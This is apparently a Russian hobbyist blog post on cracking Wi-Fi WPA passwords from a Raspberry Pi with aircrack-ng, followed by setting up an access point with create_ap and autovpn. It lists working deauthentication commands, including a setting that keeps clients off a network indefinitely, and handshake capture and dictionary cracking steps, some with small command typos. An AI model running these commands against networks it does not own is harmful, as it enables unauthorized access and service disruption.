Мне было интересно настроить свой новый (первой модели) купленный (еще и с рук за 1.5т + hdmi) расбери пай для выполнения задач из киберпанк фильмов. В этой статье не будет подробностей и скриншотов процесса, так как есть более обширные и всеобъемлющие материалы на эту тему.
Для начала ставим пакеты для работы с утилитами aircrack-ng, aireplay-ng и airdump-ng. К расбери (на расбиане) цепляем вай-фай адаптер (у меня это TP-LINK TL-WN821N).
В теории, чтобы получить пароль от сети, нам нужно перехватить хендшейк, при подключении юзера к точке доступа. Начинаем мониторить точки доступа:
sudo airdump-ng wlan0
можно делать это на конкретных каналах
iwconfig wlan0 NUM_CHANNEL sudo airdump-ng wlan0 --channel NUM_CHANNEL -w cap
После -w написал префикс дамп-файлов.
Затем переподключился к выбранной сети с телефона и перехватил хендшейк. Чтобы не ждать переподключения еще раз повторил эту процедуру, но в соседнем окне выполнил (если вместо 10 поставить 0 к сети невозможно будет подключиться до остановки работы aireplay-ng):
sudo aireplay-ng -0 10 -e NETWORK_NAME wlan0 //для всей сети
sudo aireplay-ng -0 10 -a DC:E3:05:10:37:58 wlan0 //для конкретного устройства
В другой моей домашней сети пришлось установить другой канал (при возникновении ошибки в предыдущей команде, которая примерно так и звучит "не тот канал"):
sudo iwconfig wlan0 channel NUM_CHANNEL
После этого создал txt с паролями (небольшой) в котором заранее указал известный мне пароль (это же моя домашняя сеть).
Заключительный шаг — перебор паролей.
aircrack-ng capFileName.cap -w passwordFile.txt
Ура! Теперь я уперся только в перебор паролей, а эта задача не так интересна.
После завершения работ можно вернуть стандартный режим работы адаптера.
sudo ifconfig wlan0 down sudo iwconfig wlan0 mode manage sudo ifconfig wlan0 up
Не судите строго за вольный стиль повествования. Выше написан мой маршрут к достижению цели, который не претендует на полноту и не описывает все способы взлома сетей.
!Обратите внимание, что хорошие люди и профессионалы не используют свои знания в плохих целях!
Читал много статей и пробовал дистрибутивы для создания ТД из распбери, но для меня самым удобным оказалось использование скрипта create_ap + autovpn.
Если нам нужна ТД через ВПН выполняем:
sudo
autovpn
Потом запускаем точку:
sudo create_ap wlan0 eth0 TD_NAME PASSWORD -w 2
Создаст точку с wpa2 и выдаст ей интернет через изернет интерфейс (eth0).
Если не указать -w и пароль получим открытую точку.
В двух задачах я использовал последнюю версию "Raspbian Stretch with desktop" и разнес их на две разные карточки.